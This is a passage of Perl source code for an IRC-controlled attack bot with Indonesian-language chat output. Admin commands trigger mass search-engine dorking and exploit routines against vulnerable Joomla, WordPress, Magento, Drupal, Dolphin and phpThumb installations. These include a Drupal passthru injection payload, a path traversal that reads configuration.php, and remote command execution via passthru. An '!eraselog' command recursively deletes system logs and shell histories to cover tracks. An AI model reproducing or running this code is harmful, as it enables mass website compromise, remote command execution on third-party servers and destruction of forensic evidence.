12Mesin5=$bystats5 ") }}} ##################################################################### DELETE LOG if (&isAdmin($nick) && $msg =~ /^!eraselog/) { &msg("$path","9,1 Permintaan sedang di proses..."); &msg("$path","4,1 Please wait...!"); system 'rm -rf /var/log/lastlog'; system 'rm -rf /var/log/wtmp'; system 'rm -rf /etc/wtmp'; system 'rm -rf /var/run/utmp'; system 'rm -rf /etc/utmp'; system 'rm -rf /var/log'; system 'rm -rf /var/logs'; system 'rm -rf /var/adm'; system 'rm -rf /var/apache/log'; system 'rm -rf /var/apache/logs'; system 'rm -rf /usr/local/apache/log'; system 'rm -rf /usr/local/apache/logs'; system 'rm -rf /root/.bash_history'; system 'rm -rf /root/.ksh_history'; &msg("$path","8,1Semua 4default log13 dan berkas 4bash_history 13terhapus."); sleep 1; &msg("$path","13Sekarang sisa berkas mesin4 LOG."); system 'find / -name *.bash_history -exec rm -rf {} \;'; system 'find / -name *.bash_logout -exec rm -rf {} \;'; system 'find / -name "log*" -exec rm -rf {} \;'; system 'find / -name *.log -exec rm -rf {} \;'; sleep 1; &msg("$path","9,1Selesai! Semua log dalam server sudah di hapus...!!!"); } ##################################################################### Command SCAN if (&isAdmin($nick) && $msg=~ /^$timcmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if (&isFound($timrid,"GIF89a")) { my ($bug,$dork) = ($1,$2); &msg("$path","$timlogo0Dork :4 $dork"); &msg("$path","$timlogo4Bugz :0 $bug"); &msg("$path","$timlogo15Search Engine Loading ..."); &se_start($path,$bug,$dork,$engine,25); } else { &msg("$path","[ $nick ] $timlogo 4TimThumb Uploader is Down!"); } } exit; } } ################################################################################ if (&isAdmin($nick) && $msg =~ /^$jdcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/index.php?option=com_jdownloads&Itemid=1&view=upload",$1); #&msg("$channel","4,1Lapor3 $nick15,1 lagi scan Joomla di 4$path"); &msg("$channel","15Search Engine Loaded.."); &se_start($path,$bug,$dork,$engine,3); } } } if (&isAdmin($nick) && $msg =~ /^$ninjacmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/ninja-applications/fufu/controllers/uploader/upload.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","12$nick 4Re-scan detected"); exit; } else { &msg("$channel","$ninjalogo3Search Engine Loading ..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,5); } } } } if (&isAdmin($nick) && $msg =~ /^$hwcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1",$1); &msg("$channel","$hwdlogo4Search Engine Loaded.."); &se_start($path,$bug,$dork,$engine,6); } } } if (&isAdmin($nick) && $msg =~ /^$flexcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/components/com_flexicontent/librairies/phpThumb/phpThumb.php",$1); &msg("$channel","$privlogo4Search Engine Loaded.."); &se_start($path,$bug,$dork,$engine,4); } } } if (&isAdmin($nick) && $msg =~ /^$kcfcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("",$1); #&msg("$chanxxx","11,1¤10»15Lapor 4<9=4> 9$nick 15lagi scan KcF di 4$path "); #&msg("$path","$kcflogo9Dork 4<9=4>15 $dork "); &msg("$channel","$kcflogo4Search Engine Loaded.."); &se_start($path,$bug,$dork,$engine,29); } } } if (&isAdmin($nick) && $msg =~ /^$mgcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/customer/account/login",$1); &msg("$path","7,1Sscan Start KosoWaR "); &se_start($path,$bug,$dork,$engine,18); } } } if (&isAdmin($nick) && $msg =~ /^$mgcmd2\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/customer/account/login",$1); &msg("$path","7,1Sscan Start KosoWaR "); &se_start($path,$bug,$dork,$engine,20); } } } if (&isAdmin($nick) && $msg =~ /^$mgcmd3\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("Logo Design by dewi",$1); &msg("$path","7,1Sscan Start KosoWaR "); &se_start($path,$bug,$dork,$engine,23); } } } if (&isAdmin($nick) && $msg =~ /^$prestacmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("",$1); #&msg("$channel","4,1Lapor3 $nick15,1 lagi scan Joomla di 4$path"); &msg("$channel","15Search Engine Loaded.."); &se_start($path,$bug,$dork,$engine,19); } } } if (&isAdmin($nick) && $msg =~ /^$dolphincmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("administration/modules.php",$1); &msg("$channel"," 2Search Engine Loading.....! "); &se_start($path,$bug,$dork,$engine,22); } } } if (&isAdmin($nick) && $msg =~ /^!dolcmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($target,$cmdxx) = ($1,$2); my $cetak = &dol_query($target,'passthru("'.$cmdxx.'");'); &msg("$path","$dolphinlogo$target =>15 $cetak "); } } } if (&isAdmin($nick) && $msg =~ /^$dzscmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/wp-content/plugins/dzs-videogallery/admin/upload.php",$1); &msg("$channel","12Search Engine Wait Loading.....! "); &se_start($path,$bug,$dork,$engine,24); } } } if (&isAdmin($nick) && $msg =~ /^$ihcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { #if (&isFound($timrid,"GIF89a")) { my ($bug,$dork) = ("wp-content/plugins/is-human/engine.php?action=",$1); #&msg("$chanxxx","[!] Lapor <=> $nick lagi scan Is-Human di $path "); #&msg("$path","$ihlogo Dork <=> $dork "); &msg("$path","Search Engine <=> Loading "); &se_start($path,$bug,$dork,$engine,26); #} else { #&msg("$path","[!]Injector <=> Lost!!! "); #} } } } if (&isAdmin($nick) && $msg =~ /^$alphacmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("components/com_alphacontent/assets/phpThumb/phpThumb.php",$1); &msg("$channel","$privlogo4Search Engine Loaded.."); &se_start($path,$bug,$dork,$engine,27); } } } if (&isAdmin($nick) && $msg =~ /^$foxcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id=107",$1); &msg("$channel","$privlogo4Search Engine Loaded.."); &se_start($path,$bug,$dork,$engine,28); } } } if (&isAdmin($nick) && $msg =~ /^$phpcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("phpThumb.php",$1); &msg("$path","9Search Engine 4<9=4>15 Wait Loading.....! "); &se_start($path,$bug,$dork,$engine,30); } } } if (&isAdmin($nick) && $msg =~ /^$aupcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("components/com_alphauserpoints/assets/phpThumb/phpThumb.php",$1); &msg("$path","9Search Engine 4<9=4>15 Wait Loading.....! "); &se_start($path,$bug,$dork,$engine,31); } } } if (&isAdmin($nick) && $msg =~ /^$mambotscmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("mambots/editors/jce/jscripts/tiny_mce/plugins/imgmanager/classes/phpthumb/phpThumb.php",$1); &msg("$path","9Search Engine 4<9=4>15 Wait Loading.....! "); &se_start($path,$bug,$dork,$engine,32); } } } if (&isAdmin($nick) && $msg =~ /^$plogcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("plog-includes/lib/phpthumb/phpThumb.php",$1); &msg("$path","9Search Engine 4<9=4>15 Wait Loading.....! "); &se_start($path,$bug,$dork,$engine,33); } } } if (&isAdmin($nick) && $msg =~ /^$assetscmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("assets/global/plugins/jquery-file-upload/server/php/",$1); &msg("$path","9Search Engine 4<9=4>15 Wait Loading.....! "); &se_start($path,$bug,$dork,$engine,34); } } } if (&isAdmin($nick) && $msg =~ /^$portcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("components/com_portfolio/includes/phpthumb/phpThumb.php",$1); &msg("$path","9Search Engine 4<9=4>15 Wait Loading.....! "); &se_start($path,$bug,$dork,$engine,35); } } } if (&isAdmin($nick) && $msg =~ /^$pkpcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php",$1); &msg("$path","9Search Engine 4<9=4>15 Wait Loading.....! "); &se_start($path,$bug,$dork,$engine,36); } } } if (&isAdmin($nick) && $msg =~ /^$b2jcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("com_b2jcontact",$1); &msg("$channel","10Search Engine 15 Loading.....! "); &se_start($path,$bug,$dork,$engine,37); } } } if (&isAdmin($nick) && $msg =~ /^$lmscmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("xmlrpc.php",$1); &msg("$channel","10Search Engine 15 Loading.....! "); &se_start($path,$bug,$dork,$engine,38); } } } if (&isAdmin($nick) && $msg =~ /^$drucmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=",$1); &msg("$path","9Search Engine 4<9=4>4 Wait Loading.....! "); &se_start($path,$bug,$dork,$engine,100); } } } if (&isAdmin($nick) && $msg =~ /^$hdfcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php",$1); &msg("$path","9Search Engine 4<9=4>4 Wait Loading.....! "); &se_start($path,$bug,$dork,$engine,200); } } } if (&isAdmin($nick) && $msg =~ /^$uplcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/wp-content/themes/",$1); &msg("$path","9Search Engine 4<9=4>14 Wait Loading.....! "); &se_start($path,$bug,$dork,$engine,300); } } } if (&isAdmin($nick) && $msg =~ /^$upl2cmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/wp-content/themes/",$1); &msg("$path","9Search Engine 4<9=4>14 Wait Loading.....! "); &se_start($path,$bug,$dork,$engine,400); } } } if (&isAdmin($nick) && $msg =~ /^$revcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if (-e ($update_file)) { my $dork = ("wp-admin/admin-ajax.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","$searchlogo 4Rescan boss.. "); exit; } else { #&msg("$path","$searchlogo1$nick start scanning.. "); &msg("$path","$searchlogo12Dork :4 $dork"); &msg("$channel","$searchlogo12Please wait until finish.."); sendraw("MODE $channel +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,1); } }else { &msg("$path","[ $nick ] $revlogo 4Injector is Lost!"); } } exit; } } ##################################################################### } } for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line = $line_temp.$line if ($line_temp); $line_temp = ''; $line =~ s/\r$//; unless ($c == $#lines) { parse("$line"); } else { if ($#lines == 0) { parse("$line"); } elsif ($lines[$c] =~ /\r$/) { parse("$line"); } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { parse("$line"); } else { $line_temp = $line; } } } } } ########################################################################################## Search engine sub type() { my ($chan,$bug,$dork,$engine,$type,$nick) = @_; if ($type == 1){$type=&revslider($chan,$bug,$dork,$engine);} elsif ($type == 2){$type=&showbiz($chan,$bug,$dork,$engine);} elsif ($type == 3){$type=&jdown($chan,$bug,$dork,$engine);} elsif ($type == 4){$type=&flexi_exploit($chan,$bug,$dork,$engine);} elsif ($type == 5){$type=&ninja_exploit($chan,$bug,$dork,$engine);} elsif ($type == 6){$type=&hwd($chan,$bug,$dork,$engine);} elsif ($type == 18){$type=&shoplift($chan,$bug,$dork,$engine);} elsif ($type == 19){$type=&presta_exploit($chan,$bug,$dork,$engine);} elsif ($type == 20){$type=&magadmin($chan,$bug,$dork,$engine);} elsif ($type == 22){$type=&dolphin_exploit($chan,$bug,$dork,$engine);} elsif ($type == 23){$type=&magmi_exploit($chan,$bug,$dork,$engine);} elsif ($type == 24){$type=&dzs_exploit($chan,$bug,$dork,$engine);} elsif ($type == 25){$type=&timthumb($chan,$bug,$dork,$engine);} elsif ($type == 26){$type=&ih_exploit($chan,$bug,$dork,$engine);} elsif ($type == 27){$type=&alpha_exploit($chan,$bug,$dork,$engine);} elsif ($type == 28){$type=&fox_exploit($chan,$bug,$dork,$engine);} elsif ($type == 29){$type=&kcf_exploit($chan,$bug,$dork,$engine);} elsif ($type == 30){$type=&joomla_xpl($chan,$bug,$dork,$engine);} elsif ($type == 31){$type=&joomla($chan,$bug,$dork,$engine);} elsif ($type == 32){$type=&try_xpl($chan,$bug,$dork,$engine);} elsif ($type == 33){$type=&try_xpl1($chan,$bug,$dork,$engine);} elsif ($type == 34){$type=&try_xpl2($chan,$bug,$dork,$engine);} elsif ($type == 35){$type=&portfolio_exploit($chan,$bug,$dork,$engine);} elsif ($type == 36){$type=&pkp_exploit($chan,$bug,$dork,$engine);} elsif ($type == 37){$type=&b2j_exploit($chan,$bug,$dork,$engine);} elsif ($type == 38){$type=&lms_exploit($chan,$bug,$dork,$engine);} elsif ($type == 100){$type=&dru_exploit($chan,$bug,$dork,$engine);} elsif ($type == 200){$type=&hdf($chan,$bug,$dork,$engine);} elsif ($type == 300){$type=&upl_exploit($chan,$bug,$dork,$engine);} elsif ($type == 400){$type=&upl2_exploit($chan,$bug,$dork,$engine);} } sub se_start() { my ($chan,$bug,$dork,$engine,$type,$nick) = @_; if ($engine =~ /uae/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"UAE",$type,$nick); } exit; } } if ($engine =~ /myanmar/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,dork,"Myanmar",$type,$nick); } exit; } } if ($engine =~ /argentina/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Argentina",$type,$nick); } exit; } } if ($engine =~ /austria/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Austria",$type,$nick); } exit; } } if ($engine =~ /australia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Australia",$type,$nick); } exit; } } if ($engine =~ /brazil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Brazil",$type,$nick); } exit; } } if ($engine =~ /canada/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Canada",$type,$nick); } exit; } } if ($engine =~ /chili/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Chili",$type,$nick); } exit; } } if ($engine =~ /cina/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cina",$type,$nick); } exit; } } if ($engine =~ /comersil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CoMersil",$type,$nick); } exit; } } if ($engine =~ /czech/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Czech",$type,$nick); } exit; } } if ($engine =~ /germany/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Germany",$type,$nick); } exit; } } if ($engine =~ /denmark/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Denmark",$type,$nick); } exit; } } if ($engine =~ /spain/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Spain",$type,$nick); } exit; } } if ($engine =~ /europe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Europe",$type,$nick); } exit; } } if ($engine =~ /france/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"France",$type,$nick); } exit; } } if ($engine =~ /hungary/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Hungary",$type,$nick); } exit; } } if ($engine =~ /indonesia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Indonesia",$type,$nick); } exit; } } if ($engine =~ /israel/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Israel",$type,$nick); } exit; } } if ($engine =~ /india/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"India",$type,$nick); } exit; } } if ($engine =~ /info/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Info",$type,$nick); } exit; } } if ($engine =~ /iran/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Iran",$type,$nick); } exit; } } if ($engine =~ /italy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Italy",$type,$nick); } exit; } } if ($engine =~ /japan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Japan",$type,$nick); } exit; } } if ($engine =~ /korea/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Korea",$type,$nick); } exit; } } if ($engine =~ /mexico/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Mexico",$type,$nick); } exit; } } if ($engine =~ /malaysia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Malaysia",$type,$nick); } exit; } } if ($engine =~ /network/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Network",$type,$nick); } exit; } } if ($engine =~ /netherlands/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Netherlands",$type,$nick); } exit; } } if ($engine =~ /organization/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Organization",$type,$nick); } exit; } } if ($engine =~ /philippines/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Philippines",$type,$nick); } exit; } } if ($engine =~ /poland/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Poland",$type,$nick); } exit; } } if ($engine =~ /romania/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Romania",$type,$nick); } exit; } } if ($engine =~ /russian/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Russian",$type,$nick); } exit; } } if ($engine =~ /thailand/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Thailand",$type,$nick); } exit; } } if ($engine =~ /ukraine/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Ukraine",$type,$nick); } exit; } } if ($engine =~ /england/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"England",$type,$nick); } exit; } } if ($engine =~ /usa/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"USA",$type,$nick); } exit; } } if ($engine =~ /slovenia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Slovenia",$type,$nick); } exit; } } if ($engine =~ /belgium/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Belgium",$type,$nick); } exit; } } if ($engine =~ /bussines/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bussines",$type,$nick); } exit; } } if ($engine =~ /southafrica/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SouthAfrica",$type,$nick); } exit; } } if ($engine =~ /vietnam/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Vietnam",$type,$nick); } exit; } } if ($engine =~ /tuvalu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tuvalu",$type,$nick); } exit; } } if ($engine =~ /cocos/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cocos",$type,$nick); } exit; } } if ($engine =~ /turky/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Turky",$type,$nick); } exit; } } if ($engine =~ /asia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Asia",$type,$nick); } exit; } } if ($engine =~ /serbia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Serbia",$type,$nick); } exit; } } if ($engine =~ /singapore/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Singapore",$type,$nick); } exit; } } if ($engine =~ /taiwan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Taiwan",$type,$nick); } exit; } } if ($engine =~ /sweden/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Sweden",$type,$nick); } exit; } } if ($engine =~ /pakistan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Pakistan",$type,$nick); } exit; } } if ($engine =~ /norway/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Norway",$type,$nick); } exit; } } if ($engine =~ /montenegro/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Montenegro",$type,$nick); } exit; } } if ($engine =~ /greece/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Greece",$type,$nick); } exit; } } if ($engine =~ /education/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Education",$type,$nick); } exit; } } if ($engine =~ /goverment/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Goverment",$type,$nick); } exit; } } if ($engine =~ /kazakhstan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Kazakhstan",$type,$nick); } exit; } } if ($engine =~ /afganistan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,dork,"Afganistan",$type,$nick); } exit; } } if ($engine =~ /albania/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Albania",$type,$nick); } exit; } } if ($engine =~ /algeria/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Algeria",$type,$nick); } exit; } } if ($engine =~ /angola/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Angola",$type,$nick); } exit; } } if ($engine =~ /armenia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Armenia",$type,$nick); } exit; } } if ($engine =~ /azerbaijan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Azerbaijan",$type,$nick); } exit; } } if ($engine =~ /bahrain/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bahrain",$type,$nick); } exit; } } if ($engine =~ /bangladesh/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bangladesh",$type,$nick); } exit; } } if ($engine =~ /belarus/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Belarus",$type,$nick); } exit; } } if ($engine =~ /bhutan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bhutan",$type,$nick); } exit; } } if ($engine =~ /bolivia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bolivia",$type,$nick); } exit; } } if ($engine =~ /bosnia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bosnia",$type,$nick); } exit; } } if ($engine =~ /bulgaria/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bulgaria",$type,$nick); } exit; } } if ($engine =~ /brunei/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Brunei",$type,$nick); } exit; } } if ($engine =~ /cambodia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cambodia",$type,$nick); } exit; } } if ($engine =~ /cameroon/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cameroon",$type,$nick); } exit; } } if ($engine =~ /christmas/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Christmas",$type,$nick); } exit; } } if ($engine =~ /costarika/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CostaRika",$type,$nick); } exit; } } if ($engine =~ /croatia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Croatia",$type,$nick); } exit; } } if ($engine =~ /cuba/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cuba",$type,$nick); } exit; } } if ($engine =~ /cyprus/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cyprus",$type,$nick); } exit; } } if ($engine =~ /dominican/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Dominican",$type,$nick); } exit; } } if ($engine =~ /equador/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Equador",$type,$nick); } exit; } } if ($engine =~ /egypt/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Egypt",$type,$nick); } exit; } } if ($engine =~ /estonia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Estonia",$type,$nick); } exit; } } if ($engine =~ /finland/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Finland",$type,$nick); } exit; } } if ($engine =~ /georgia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Georgia",$type,$nick); } exit; } } if ($engine =~ /ghana/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Ghana",$type,$nick); } exit; } } if ($engine =~ /grenada/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { 